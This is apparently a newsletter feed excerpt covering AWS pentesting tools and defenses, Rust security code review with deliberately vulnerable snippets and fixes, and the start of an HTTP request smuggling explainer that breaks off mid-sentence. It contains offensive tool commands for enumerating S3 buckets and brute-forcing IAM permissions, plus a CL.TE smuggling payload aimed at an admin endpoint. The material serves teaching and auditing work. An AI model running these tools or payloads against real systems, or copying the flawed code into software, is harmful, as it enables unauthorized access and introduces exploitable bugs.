python cloudmapper.py webserver
```

### Exploitation and Post-Exploitation

**[Pacu](https://github.com/RhinoSecurityLabs/pacu)**: AWS exploitation framework (like Metasploit for AWS)

```bash
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
bash install.sh
python pacu.py
```

Features:
- Privilege escalation modules
- Credential harvesting
- Service enumeration
- Data exfiltration

**[WeirdAAL](https://github.com/carnal0wnage/weirdAAL)**: AWS attack library

```bash
git clone https://github.com/carnal0wnage/weirdAAL
cd weirdAAL
python weirdAAL.py -m list_modules
```

### S3 Bucket Enumeration

**[S3Scanner](https://github.com/sa7mon/S3Scanner)**: Check S3 bucket permissions

```bash
pip install s3scanner
s3scanner scan --buckets-file bucket-names.txt
```

**[cloud_enum](https://github.com/initstring/cloud_enum)**: Multi-cloud OSINT tool

```bash
python3 cloud_enum.py -k company-name
```

**[bucket-stream](https://github.com/eth0izzle/bucket-stream)**: Real-time S3 bucket discovery from certificate transparency logs

**[slurp](https://github.com/0xbharath/slurp)**: S3 bucket enumerator

```bash
slurp domain -t company.com
```

**[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)**: S3 bucket enumeration and download tool

```bash
python AWSBucketDump.py -l bucket-names.txt -g
```

### IAM Permission Enumeration

**[enumerate-iam](https://github.com/andresriancho/enumerate-iam)**: Brute-force IAM permissions

```bash
python enumerate-iam.py --access-key ASIAXXX --secret-key wJalr... --session-token IQoJ...
```

### Credential Scanning

**[GitLeaks](https://github.com/gitleaks/gitleaks)**: Find secrets in git repos

```bash
gitleaks detect --source . --report-path report.json
```

**[TruffleHog](https://github.com/trufflesecurity/trufflehog)**: High-entropy string scanner

```bash
trufflehog git https://github.com/target/repo
```

**[GitRob](https://github.com/michenriksen/gitrob)**: Find sensitive files in GitHub organizations

### AWS CLI Essentials

The AWS CLI is your best friend:

```bash
# Install
pip install awscli

# Configure (if you have credentials)
aws configure

# Basic commands
aws sts get-caller-identity  # Who am I?
aws s3 ls                     # List S3 buckets
aws ec2 describe-instances    # List EC2 instances
aws iam list-users            # List IAM users
aws iam get-user              # Get current user details
```

## 🧪 Hands-On Labs

Practice safely in controlled environments:

### [flAWS.cloud](http://flaws.cloud/)

**Free AWS security challenges:**
- Level 1: Find S3 bucket contents
- Level 2: Publicly exposed S3 bucket with credentials
- Level 3: EC2 metadata service exploitation
- Level 4-6: Advanced privilege escalation

**No AWS account required for early levels.**

### [flAWS2.cloud](http://flaws2.cloud/)

Sequel to flAWS with defender and attacker paths.

### [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat)

**Vulnerable-by-design AWS infrastructure:**

```bash
git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip install -r requirements.txt
python cloudgoat.py config profile
python cloudgoat.py config whitelist --auto
python cloudgoat.py create iam_privesc_by_rollback
```

**Requires your own AWS account** (uses free tier resources).

Scenarios include:
- IAM privilege escalation
- Lambda function exploitation
- EC2 SSRF to metadata
- S3 bucket enumeration

### [TryHackMe - AWS Security](https://tryhackme.com/)

Search for &quot;AWS&quot; on TryHackMe for guided rooms.

### [PentesterLab - AWS Badge](https://pentesterlab.com/badges/aws)

Paid platform with structured AWS security exercises.

## 🔒 Detection and Defense

### For Blue Teams

**1. Monitor CloudTrail Logs**

AWS CloudTrail logs all API calls. Enable it and monitor for:
- `GetObject` on sensitive S3 buckets from unknown IPs
- `AssumeRole` from unexpected sources
- Failed authentication attempts
- Enumeration activities (rapid `Describe*` calls)

**2. Enable S3 Block Public Access**

At the account level:
```bash
aws s3control put-public-access-block \
  --account-id &lt;account-id&gt; \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```

**3. Enforce IMDSv2**

Disable IMDSv1 on all EC2 instances:
```bash
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
```

**4. Use AWS IAM Access Analyzer**

Automatically identifies resources shared with external entities:
```bash
aws accessanalyzer create-analyzer --analyzer-name my-analyzer --type ACCOUNT
```

**5. Implement Least Privilege IAM Policies**

Avoid wildcard permissions:
```json
{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: &quot;*&quot;,
  &quot;Resource&quot;: &quot;*&quot;
}
```

Instead, grant specific permissions:
```json
{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: [&quot;s3:GetObject&quot;, &quot;s3:PutObject&quot;],
  &quot;Resource&quot;: &quot;arn:aws:s3:::my-bucket/*&quot;
}
```

**6. Enable MFA for IAM Users**

Require MFA for console access and sensitive API calls.

**7. Rotate Access Keys Regularly**

Old, forgotten access keys are a common entry point.

**8. Use AWS Config**

Monitor resource configuration changes and compliance:
```bash
aws configservice put-configuration-recorder \
  --configuration-recorder name=default,roleARN=arn:aws:iam::account:role/config-role
```

### For Developers

**Secure S3 Buckets:**
- Never make buckets public unless absolutely necessary
- Use bucket policies with specific IP restrictions
- Enable versioning and logging
- Use pre-signed URLs for temporary access

**Protect Against SSRF:**
- Validate and sanitize all URLs
- Use allowlists, not denylists
- Block access to metadata service (`169.254.169.254`)
- Implement network-level controls

**Don&apos;t Hardcode Credentials:**
- Use IAM roles for EC2/Lambda
- Use AWS Secrets Manager or Parameter Store
- Never commit credentials to git

## 🎯 Key Takeaways

- **AWS is not inherently insecure, but misconfigurations are everywhere**
- **S3 buckets are the most common AWS vulnerability** due to public access misconfigurations
- **SSRF to EC2 metadata service can leak IAM credentials**, granting access to other AWS resources
- **You don&apos;t need AWS credentials to enumerate many resources** via DNS, certificate transparency, and public APIs
- **Subdomain takeovers via S3 are common** when DNS records point to non-existent buckets
- **IMDSv2 makes metadata exploitation harder** but not impossible
- **Defense requires proactive monitoring, least privilege IAM, and blocking public access by default**
- **CloudTrail, Config, and IAM Access Analyzer are essential** for visibility and compliance

## 📚 Further Reading

- **[flAWS.cloud](http://flaws.cloud/)**: Hands-on AWS security challenges (free)
- **[AWS Security Best Practices](https://docs.aws.amazon.com/security/)**: Official AWS security documentation
- **[Rhino Security Labs AWS Pentesting Resources](https://rhinosecuritylabs.com/aws-pentesting/)**: Detailed guides on AWS exploitation techniques
- **[HackTricks Cloud SSRF](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html)**: AWS metadata service exploitation techniques
- **[HackTricks S3 Buckets](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/buckets)**: S3 enumeration and exploitation guide
- **[AWS IAM Policy Simulator](https://policysim.aws.amazon.com/)**: Test IAM policies before deployment
- **[CloudGoat Documentation](https://github.com/RhinoSecurityLabs/cloudgoat)**: Vulnerable AWS environment setup
- **[AWS IMDSv2 Documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)**: Official guide on securing metadata service

---

That&apos;s it for this week!

If you&apos;ve been avoiding AWS pentesting because it felt overwhelming, I hope this demystifies it. Start simple. Enumerate S3 buckets on your next target. Test for SSRF and try hitting the metadata service. Use the free flAWS.cloud labs to practice.

Cloud security is a massive field, but you don&apos;t need to know everything to find high-impact vulnerabilities. Focus on the basics: S3, IAM, and SSRF. You&apos;ll be surprised how often these simple techniques work.

Thanks for reading, and happy hacking ☁️

— Ruben</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Rust Security Code Review: When Memory Safety Isn&apos;t Enough</title><link>https://www.kayssel.com/newsletter/issue-27</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-27</guid><description>How to find vulnerabilities in Rust codebases despite the borrow checker, from unsafe blocks to logic bugs the compiler can&apos;t catch</description><pubDate>Sun, 07 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

On November 18, 2025, [Cloudflare went down and took half the Internet with it](https://blog.cloudflare.com/18-november-2025-outage/). ChatGPT stopped responding. Claude returned errors. Shopify, Uber, Dropbox. All showing 5xx errors for hours. The culprit? A single line of Rust code.

```rust
.unwrap()
```

That&apos;s it. One `.unwrap()` in production code that assumed &quot;this will never happen.&quot; But it did happen. A configuration file doubled in size. The code panicked. And [330+ data centers across the globe stopped serving traffic](https://medium.com/@lordmoma/trust-me-bro-the-cloudflare-rust-unwrap-that-panicked-across-330-data-centers-a29f33ef1ba9).

This incident got me digging deeper into Rust security. I&apos;ve been studying Rust for blockchain work (Solana programs, mostly) and kept hearing the same mantra: &quot;It&apos;s memory safe, so it&apos;s secure.&quot; But the Cloudflare outage proved what I suspected. Memory safety doesn&apos;t mean security.

After going through the [postmortem](https://blog.cloudflare.com/18-november-2025-outage/), analyzing similar incidents, and reviewing Rust CVEs, I realized Rust has security problems that most developers don&apos;t talk about. Panics that cause DoS. Integer overflows that wrap silently in release mode. Logic bugs the compiler can&apos;t catch. And `unsafe` blocks where all bets are off.

Rust is being adopted everywhere. The Linux kernel, Android, Windows components, Solana smart contracts, crypto wallets, embedded systems. As Rust codebases grow, so does the attack surface. And most developers assume the compiler catches everything. It doesn&apos;t.

The worst part? Traditional security tools designed for C/C++ don&apos;t understand Rust&apos;s semantics. And auditors trained on memory corruption bugs often miss the subtle logic flaws that Rust allows.

In this issue, we&apos;ll cover:
- Common security vulnerabilities in Rust code
- The dangers hiding in `unsafe` blocks
- Integer overflow and underflow exploitation
- Panic-based denial of service attacks
- Logic bugs the borrow checker can&apos;t catch
- FFI security pitfalls
- Tools and techniques for Rust security audits
- Defense strategies and secure coding patterns

If you&apos;re auditing Rust code, building Rust applications, or just curious about the security landscape beyond memory safety, this is essential knowledge.

Let&apos;s break some assumptions 👇

## 🔍 The Myth of Complete Safety

Let&apos;s be clear about what Rust guarantees and what it doesn&apos;t.

### What Rust Prevents

**Memory Safety**:
```rust
// This won&apos;t compile
let mut v = vec![1, 2, 3];
let first = &amp;v[0];
v.push(4);  // Error: can&apos;t mutate while borrowed
println!(&quot;{}&quot;, first);
```

The borrow checker catches this at compile time. No dangling pointers, no data races.

**Thread Safety**:
```rust
// This won&apos;t compile
let mut data = vec![1, 2, 3];
std::thread::spawn(move || {
    data.push(4);
});
data.push(5);  // Error: value moved
```

Rust&apos;s ownership system prevents data races by construction.

### What Rust Doesn&apos;t Prevent

**Logic Bugs**:
```rust
// Compiles fine, logic is wrong
fn withdraw(balance: &amp;mut u64, amount: u64) -&gt; bool {
    *balance -= amount;  // VULNERABILITY: No balance check at all
    true
}
```

The borrow checker doesn&apos;t care about business logic. This function will happily underflow if `amount &gt; *balance`.

**Integer Overflow** (in release mode):
```rust
// Compiles fine, overflows in production
fn calculate_fee(price: u64) -&gt; u64 {
    price * 10 / 100  // VULNERABILITY: Can overflow
}
```

In debug builds, this panics. In release builds, it wraps silently.

**Panic-Based DoS**:
```rust
// Compiles fine, panics on invalid input
fn process(data: &amp;[u8]) {
    let value = data[0];  // VULNERABILITY: Panics if data is empty
    // ...
}
```

Out-of-bounds access panics instead of corrupting memory. But a panic can still take down your service.

## 🧨 Unsafe Rust: Where Dragons Live

The `unsafe` keyword is Rust&apos;s escape hatch. It disables the borrow checker for specific operations. And that&apos;s where memory corruption bugs can still hide.

### When Unsafe Is Necessary

Rust requires `unsafe` for:
- Dereferencing raw pointers
- Calling `unsafe` functions
- Implementing `unsafe` traits
- Accessing mutable statics
- FFI calls to C/C++ code

**Legitimate use**:
```rust
unsafe fn read_volatile_register(addr: usize) -&gt; u32 {
    std::ptr::read_volatile(addr as *const u32)
}
```

This is necessary for hardware interaction. But it&apos;s also where bugs creep in.

### Vulnerable Unsafe Code

**Unvalidated Pointer Dereference**:
```rust
// VULNERABILITY: No bounds checking
unsafe fn get_element(ptr: *const u32, index: usize) -&gt; u32 {
    *ptr.add(index)  // Can read arbitrary memory
}
```

If `index` is attacker-controlled, this is a memory disclosure vulnerability.

**Use-After-Free**:
```rust
// VULNERABILITY: Dangling pointer
let mut data = Box::new(42);
let ptr = &amp;*data as *const i32;
drop(data);  // Memory freed
unsafe {
    println!(&quot;{}&quot;, *ptr);  // Use-after-free
}
```

Inside `unsafe`, Rust can&apos;t protect you.

**Incorrect Lifetime Assumptions**:
```rust
// VULNERABILITY: Returns dangling reference
unsafe fn dangling_ref&lt;&apos;a&gt;() -&gt; &amp;&apos;a str {
    let s = String::from(&quot;temp&quot;);
    std::mem::transmute::&lt;&amp;str, &amp;&apos;a str&gt;(s.as_str())
    // s is dropped, reference is dangling
}
```

Using `transmute` to lie about lifetimes bypasses safety checks.

## 🔢 Integer Overflow and Underflow

Rust&apos;s integer behavior changes between debug and release builds.

### Debug vs Release Mode

**Debug mode** (default for `cargo build`):
```rust
let x: u8 = 255;
let y = x + 1;  // Panics: attempt to add with overflow
```

**Release mode** (`cargo build --release`):
```rust
let x: u8 = 255;
let y = x + 1;  // Wraps to 0, no panic
```

This is dangerous. Code tested in debug mode can silently misbehave in production.

### Exploitable Overflow

**Token Balance Calculation**:
```rust
// VULNERABILITY: Overflow in fee calculation
fn calculate_total(price: u64, quantity: u32) -&gt; u64 {
    price * (quantity as u64)  // Can overflow
}

// Attacker sets quantity = u32::MAX
// price * quantity wraps, total becomes tiny
```

In a marketplace, this could let attackers buy expensive items for pennies.

### Safe Alternatives

**Checked arithmetic**:
```rust
fn safe_multiply(a: u64, b: u64) -&gt; Result&lt;u64, &amp;&apos;static str&gt; {
    a.checked_mul(b).ok_or(&quot;Overflow&quot;)
}
```

**Saturating arithmetic**:
```rust
fn safe_add(a: u64, b: u64) -&gt; u64 {
    a.saturating_add(b)  // Clamps to u64::MAX instead of wrapping
}
```

**Wrapping arithmetic** (explicit):
```rust
fn intentional_wrap(a: u8, b: u8) -&gt; u8 {
    a.wrapping_add(b)  // Makes wrapping behavior explicit
}
```

Use `checked_*`, `saturating_*`, or `wrapping_*` methods. Never rely on default overflow behavior in security-critical code.

## 💥 Panic-Based Denial of Service

Panics in Rust are like exceptions in other languages, but with a key difference: by default, panics unwind the stack and terminate the thread. In single-threaded services, that means the entire service crashes.

### Panic Sources

**Array Indexing**:
```rust
// VULNERABILITY: Panics if index is out of bounds
fn get_user_score(scores: &amp;[u32], user_id: usize) -&gt; u32 {
    scores[user_id]  // Panics if user_id &gt;= scores.len()
}
```

If `user_id` comes from user input, an attacker can crash the service.

**Unwrap and Expect**:
```rust
// VULNERABILITY: Panics if input is invalid
fn parse_config(json: &amp;str) -&gt; Config {
    serde_json::from_str(json).unwrap()  // Panics on invalid JSON
}
```

Any malformed input crashes the application.

**Division by Zero**:
```rust
// VULNERABILITY: Panics if denominator is zero
fn calculate_ratio(numerator: u64, denominator: u64) -&gt; u64 {
    numerator / denominator  // Panics if denominator == 0
}
```

**Slice Operations**:
```rust
// VULNERABILITY: Panics if range is invalid
fn extract_header(data: &amp;[u8]) -&gt; &amp;[u8] {
    &amp;data[0..20]  // Panics if data.len() &lt; 20
}
```

### Real-World Example: Solana Programs

Solana smart contracts (programs) are written in Rust. A panic in a program causes the transaction to fail. Attackers can use this for griefing attacks:

```rust
// Vulnerable Solana program
pub fn process_instruction(accounts: &amp;[AccountInfo], data: &amp;[u8]) -&gt; ProgramResult {
    // VULNERABILITY: Panics if data.len() &lt; 8
    let amount_bytes: [u8; 8] = data[0..8].try_into().unwrap();
    let amount = u64::from_le_bytes(amount_bytes);
    // If data is shorter than 8 bytes, this panics
    // Transaction fails, attacker can DoS the program
    Ok(())
}
```

### Safe Alternatives

Use safe accessors:
```rust
// Safe: Returns None instead of panicking
fn get_user_score_safe(scores: &amp;[u32], user_id: usize) -&gt; Option&lt;u32&gt; {
    scores.get(user_id).copied()
}

// Safe: Returns Result
fn parse_config_safe(json: &amp;str) -&gt; Result&lt;Config, serde_json::Error&gt; {
    serde_json::from_str(json)
}

// Safe: Explicit check
fn calculate_ratio_safe(numerator: u64, denominator: u64) -&gt; Option&lt;u64&gt; {
    if denominator == 0 {
        None
    } else {
        Some(numerator / denominator)
    }
}
```

**Rule of thumb**: In production code, avoid `unwrap()`, `expect()`, direct indexing, and unchecked arithmetic. Use `?`, `match`, `if let`, and `get()`.

## 🔗 FFI: The Unsafe Boundary

Foreign Function Interface (FFI) allows Rust to call C/C++ code. This is necessary for interacting with existing libraries, but it&apos;s also where Rust&apos;s guarantees end.

### FFI Vulnerabilities

**Unvalidated C Strings**:
```rust
use std::ffi::{CStr, c_char};

// VULNERABILITY: No validation of C string
unsafe fn call_c_function(input: *const c_char) {
    let c_str = CStr::from_ptr(input);  // UNSAFE: Assumes input is valid &amp; null-terminated
    // If input is not null-terminated, this can read past buffer
    let rust_str = c_str.to_str().unwrap();
}
```

**Buffer Overflow via C**:
```rust
extern &quot;C&quot; {
    fn unsafe_copy(dest: *mut u8, src: *const u8, len: usize);
}

// VULNERABILITY: C function doesn&apos;t check bounds
unsafe fn copy_data(dest: &amp;mut [u8], src: &amp;[u8]) {
    unsafe_copy(dest.as_mut_ptr(), src.as_ptr(), src.len());
    // If src.len() &gt; dest.len(), buffer overflow
}
```

**Type Confusion**:
```rust
// VULNERABILITY: C function expects different layout
struct Item {
    id: u32,
    value: u64,
}

#[repr(C)]
struct Data {
    count: u32,
    items: *mut Item,
}

// If C code expects different field order or alignment, memory corruption
```

### Safe FFI Practices

1. **Validate all inputs** before passing to C:
```rust
fn safe_c_string(s: &amp;str) -&gt; Result&lt;CString, NulError&gt; {
    CString::new(s)  // Validates no null bytes in middle
}
```

2. **Check buffer sizes** before calling C:
```rust
unsafe fn safe_copy(dest: &amp;mut [u8], src: &amp;[u8]) -&gt; Result&lt;(), &amp;&apos;static str&gt; {
    if src.len() &gt; dest.len() {
        return Err(&quot;Buffer too small&quot;);
    }
    unsafe_copy(dest.as_mut_ptr(), src.as_ptr(), src.len());
    Ok(())
}
```

3. **Use `#[repr(C)]`** for FFI structs:
```rust
#[repr(C)]  // Ensures C-compatible layout
struct FfiData {
    x: u32,
    y: u64,
}
```

4. **Never trust C code**: Assume C functions can violate Rust&apos;s invariants. Validate everything.

## 🐛 Logic Bugs the Compiler Can&apos;t Catch

These are the vulnerabilities that make Rust codebases just as vulnerable as any other language when it comes to application logic.

### Authentication Bypass

```rust
// VULNERABILITY: Logic error in authentication
fn authenticate(username: &amp;str, password: &amp;str, stored_hash: &amp;str) -&gt; bool {
    let hash = compute_hash(password);
    hash == stored_hash  // VULNERABILITY: No error handling
}

// Usage
if authenticate(&quot;admin&quot;, user_input, stored) {
    grant_access();
}

// If compute_hash() returns empty string on error,
// attacker can trigger error condition to bypass auth
```

### Race Conditions

Rust prevents data races, but not logical race conditions:

```rust
use std::sync::{Arc, Mutex};

struct Account {
    balance: u64,
}

// VULNERABILITY: Time-of-check to time-of-use (TOCTOU)
fn withdraw(account: &amp;Arc&lt;Mutex&lt;Account&gt;&gt;, amount: u64) -&gt; bool {
    let balance = {
        let acc = account.lock().unwrap();
        acc.balance  // Check
    };

    if balance &gt;= amount {
        // VULNERABILITY: Another thread can withdraw between check and use
        std::thread::sleep(std::time::Duration::from_millis(100));

        let mut acc = account.lock().unwrap();
        acc.balance -= amount;  // Use
        true
    } else {
        false
    }
}
```

Two threads can both pass the check and double-spend the balance.

### Incorrect Access Control

```rust
// VULNERABILITY: Missing permission check
fn delete_post(post_id: u64, user_id: u64) -&gt; Result&lt;(), &amp;&apos;static str&gt; {
    let post = get_post(post_id)?;
    // VULNERABILITY: Never checks if user_id owns post
    delete_from_db(post_id);
    Ok(())
}
```

The function compiles. The types are correct. But the authorization logic is missing.

### Cryptographic Misuse

```rust
// VULNERABILITY: Token too short
fn generate_session_token() -&gt; String {
    use rand::Rng;
    let mut rng = rand::thread_rng();
    format!(&quot;{:x}&quot;, rng.gen::&lt;u64&gt;())  // VULNERABILITY: Only 64 bits (8 bytes)
}
```

While `thread_rng()` is cryptographically secure, a 64-bit token is too short for session tokens (only 2^64 possible values). Secure session tokens should be at least 128 bits (16 bytes). Use proper token generation with sufficient entropy:

```rust
use rand::Rng;

fn generate_session_token() -&gt; String {
    let mut rng = rand::thread_rng();
    let token: [u8; 32] = rng.gen();  // 256 bits
    hex::encode(token)  // Requires: hex = &quot;0.4&quot; in Cargo.toml
}
```

## 🛠️ Tools of the Trade

For general-purpose code review tools like Semgrep, CodeQL, and static analysis fundamentals, check out [Issue #16](/post/issue-16) where we covered secure code review tooling in depth. Here, we&apos;ll focus on Rust-specific security tools.

**Rust-Specific Static Analysis:**

**[Clippy](https://github.com/rust-lang/rust-clippy)**: Official Rust linter with security-focused rules.
```bash
cargo clippy -- -W clippy::all -W clippy::pedantic
```

**[cargo-audit](https://github.com/rustsec/rustsec/tree/main/cargo-audit)**: Checks dependencies for known vulnerabilities.
```bash
cargo install cargo-audit
cargo audit
```

**[cargo-deny](https://github.com/EmbarkStudios/cargo-deny)**: Lints for dependency licenses, sources, security advisories.
```bash
cargo install cargo-deny
cargo deny check
```

**[cargo-geiger](https://github.com/geiger-rs/cargo-geiger)**: Detects usage of `unsafe` in dependencies.
```bash
cargo install cargo-geiger
cargo geiger
```

**Rust-Specific Dynamic Analysis:**

**[cargo-fuzz](https://github.com/rust-fuzz/cargo-fuzz)**: Fuzzing for Rust using libFuzzer.
```bash
cargo install cargo-fuzz
cargo fuzz init
cargo fuzz run target_name
```

**[American Fuzzy Lop (AFL)](https://github.com/rust-fuzz/afl.rs)**: AFL fuzzer for Rust.

**[Miri](https://github.com/rust-lang/miri)**: Interpreter that detects undefined behavior and memory errors.
```bash
rustup component add miri
cargo miri test
```

**Manual Review Tools:**

**[ripgrep](https://github.com/BurntSushi/ripgrep)**: Fast grep for finding patterns.
```bash
rg &quot;unsafe|unwrap|expect|panic&quot; src/
```

**[tokei](https://github.com/XAMPPRocky/tokei)**: Count lines of code, useful for scoping reviews.
```bash
cargo install tokei
tokei src/
```

## 🔒 Defense and Detection

### For Developers

**1. Enable Overflow Checks in Release Mode**

By default, release builds don&apos;t check for overflow. Enable them:
```toml
[profile.release]
overflow-checks = true
```

**2. Use Strict Clippy Lints**

Add to `.cargo/config.toml`:
```toml
[target.&apos;cfg(all())&apos;]
rustflags = [
    &quot;-W&quot;, &quot;clippy::unwrap_used&quot;,
    &quot;-W&quot;, &quot;clippy::expect_used&quot;,
    &quot;-W&quot;, &quot;clippy::panic&quot;,
    &quot;-W&quot;, &quot;clippy::indexing_slicing&quot;,
]
```

**3. Minimize Unsafe Code**

Isolate `unsafe` blocks in dedicated modules. Document invariants:
```rust
/// SAFETY: Caller must ensure `ptr` is valid for `len` bytes
unsafe fn read_bytes(ptr: *const u8, len: usize) -&gt; &amp;[u8] {
    std::slice::from_raw_parts(ptr, len)
}
```

**4. Use Result Instead of Panic**

Replace `unwrap()` with proper error handling:
```rust
// Bad
let value = map.get(&quot;key&quot;).unwrap();

// Good
let value = map.get(&quot;key&quot;).ok_or(&quot;Key not found&quot;)?;
```

**5. Test with Miri**

Run tests under Miri to detect undefined behavior:
```bash
cargo miri test
```

**6. Fuzz Critical Code Paths**

Use `cargo-fuzz` on parsing, deserialization, and crypto code:
```rust
#[cfg(fuzzing)]
pub fn fuzz_parse(data: &amp;[u8]) {
    let _ = parse_message(data);
}
```

**7. Enable Security-Focused Features**

```toml
[dependencies]
serde = { version = &quot;1.0&quot;, features = [&quot;derive&quot;] }

[profile.dev]
panic = &quot;abort&quot;  # Catch panics in testing

[profile.release]
panic = &quot;abort&quot;  # Smaller binary, clearer behavior
overflow-checks = true
```

### For Auditors

**Audit Checklist:**

- [ ] Run `cargo geiger` to find all `unsafe` usage
- [ ] Review every `unsafe` block for memory safety
- [ ] Search for `unwrap()`, `expect()`, `panic!()`, `[]` indexing
- [ ] Check integer arithmetic in financial/critical code
- [ ] Verify FFI boundaries are properly validated
- [ ] Look for TOCTOU race conditions in multi-threaded code
- [ ] Verify cryptographic library usage (key generation, randomness)
- [ ] Check authentication and authorization logic
- [ ] Test panic behavior with malformed inputs
- [ ] Run `cargo audit` for known vulnerable dependencies
- [ ] Use Miri on test suite to catch UB

**Red Flags:**
- High percentage of `unsafe` code
- `transmute` usage (lifetime manipulation)
- Manual memory management with `Box::from_raw`, `ptr::write`
- Arithmetic on user-controlled values without checks
- FFI calls without validation
- `panic=&quot;unwind&quot;` in production services

## 🎯 Key Takeaways

- **Memory safety ≠ security**. Rust eliminates memory corruption but allows logic bugs, integer overflow, and panic-based DoS
- **`unsafe` blocks require manual auditing**. The borrow checker is disabled, so all memory safety rules must be verified manually
- **Integer overflow behavior changes** between debug and release builds. Always use `checked_*`, `saturating_*`, or `wrapping_*` methods in security-critical code
- **Panics can cause DoS**. Avoid `unwrap()`, `expect()`, direct indexing, and unchecked operations in production
- **FFI is the danger zone**. Validate all inputs before passing to C/C++ code, never trust C return values
- **Logic bugs are language-agnostic**. Authentication, authorization, race conditions, and crypto misuse exist in Rust too
- **Tooling is essential**. Use `cargo-audit`, `cargo-geiger`, `clippy`, and `miri` as part of your security workflow
- **Rust is evolving**. Stay updated with [RustSec advisories](https://rustsec.org/) and the [Security WG](https://github.com/rust-secure-code/wg)

## 📚 Further Reading

- **[Rust Security Guidelines](https://anssi-fr.github.io/rust-guide/)** (ANSSI): Comprehensive security guide from French cybersecurity agency
- **[RustSec Advisory Database](https://rustsec.org/)**: Curated database of security vulnerabilities in Rust crates
- **[The Rustonomicon](https://doc.rust-lang.org/nomicon/)**: The Dark Arts of Unsafe Rust - official guide to `unsafe` code
- **[Rust Security Working Group](https://github.com/rust-secure-code/wg)**: Community working group focused on Rust security
- **[Memory-Safety Challenge Considered Solved?](https://arxiv.org/abs/2003.03296)**: Academic study analyzing all Rust CVEs through 2020, showing that memory-safety bugs require unsafe code
- **[Understanding Memory and Thread Safety Practices](https://songlh.github.io/paper/rust-study.pdf)**: Research paper analyzing 70 real-world Rust memory-safety issues
- **[Solana Security Best Practices](https://github.com/coral-xyz/sealevel-attacks)**: Security patterns for Rust-based smart contracts

---

That&apos;s it for this week!

If you&apos;re building or auditing Rust code, don&apos;t assume the compiler catches everything. Spend time reviewing `unsafe` blocks, checking integer arithmetic, and testing panic scenarios. The memory safety is real, but the security depends on you.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>code-review</category><author>Ruben Santos</author></item><item><title>HTTP Request Smuggling: The Art of Confusing Web Servers</title><link>https://www.kayssel.com/newsletter/issue-26</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-26</guid><description>How attackers exploit parsing discrepancies between frontend and backend servers to bypass security controls, poison caches, and hijack sessions</description><pubDate>Sun, 30 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

HTTP Request Smuggling has been on my radar since I first read [James Kettle&apos;s research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) at PortSwigger. The concept seemed almost too elegant. You exploit the difference in how two servers parse HTTP requests. The frontend sees one request, the backend sees two. Suddenly you&apos;re bypassing WAFs, poisoning caches, and stealing sessions.

What makes this attack fascinating is its subtlety. You&apos;re not exploiting a bug in the traditional sense. You&apos;re exploiting ambiguity in how HTTP specifications are implemented. Different servers interpret the same request differently. And that discrepancy becomes your attack surface.

Here&apos;s the thing. HTTP Request Smuggling has been around since 2005. Yet it remains &quot;everywhere and massively under-researched&quot; according to Kettle. In 2024 and 2025, researchers continue to find new variants affecting major platforms. Google Cloud. Apache. ASP.NET Core. Even Akamai&apos;s own infrastructure. The attack surface keeps growing.

The worst part? Traditional security scanners often miss these vulnerabilities entirely. The requests look legitimate. The responses seem normal. But behind the scenes, you&apos;re injecting requests that bypass every security control in the path.

In this issue, we&apos;ll cover:
- How HTTP parsing discrepancies create smuggling opportunities
- CL.TE, TE.CL, and newer variants like TE.0
- Detecting and exploiting smuggling vulnerabilities
- Cache poisoning and session hijacking techniques
- HTTP/2 downgrade attacks and H2C smuggling
- Recent CVEs including the critical ASP.NET Core vulnerability
- Defense strategies that actually work

If you&apos;re testing web applications behind reverse proxies or CDNs, this is essential knowledge.

Let&apos;s confuse some servers 👇

## 🎯 Why Request Smuggling Matters

Request smuggling attacks exploit the fundamental way HTTP connections work. When you have a frontend server (reverse proxy, load balancer, CDN) and a backend server, they need to agree on where one request ends and the next begins. If they disagree, an attacker can inject a second request that only the backend sees.

**Impact**:
- **Bypass Security Controls**: WAFs and access controls only see the first request. The smuggled request flies under the radar.
- **Poison Web Caches**: Force the cache to store malicious content for legitimate URLs.
- **Steal User Sessions**: Capture other users&apos; requests by leaving a partial request on the connection.
- **Gain Unauthorized Access**: Access admin endpoints that the frontend would normally block.

The attack works because [HTTP/1.1 allows persistent connections](https://datatracker.ietf.org/doc/html/rfc7230#section-6.3). Multiple requests flow through the same TCP connection. If the frontend and backend disagree on request boundaries, chaos ensues.

## 🔍 Understanding HTTP Request Length

HTTP/1.1 provides two ways to specify request body length:

### Content-Length Header

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 13

Hello, World!
```

The `Content-Length` header tells the server exactly how many bytes to read. Simple and straightforward.

### Transfer-Encoding: chunked

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

b
Hello World
0

```

Chunked encoding sends data in pieces. Each chunk starts with its size in hexadecimal, followed by the data. A chunk of size `0` signals the end.

**The Problem**: What happens when a request includes both headers? The [HTTP specification (RFC 7230)](https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3) says `Transfer-Encoding` should take precedence. But not every server follows the spec.

## 🧨 Classic Smuggling Variants

### CL.TE (Content-Length / Transfer-Encoding)

The frontend uses `Content-Length`. The backend uses `Transfer-Encoding`.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 30
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Foo: x
```

**What happens**:

1. Frontend sees `Content-Length: 30` and forwards exactly 30 bytes
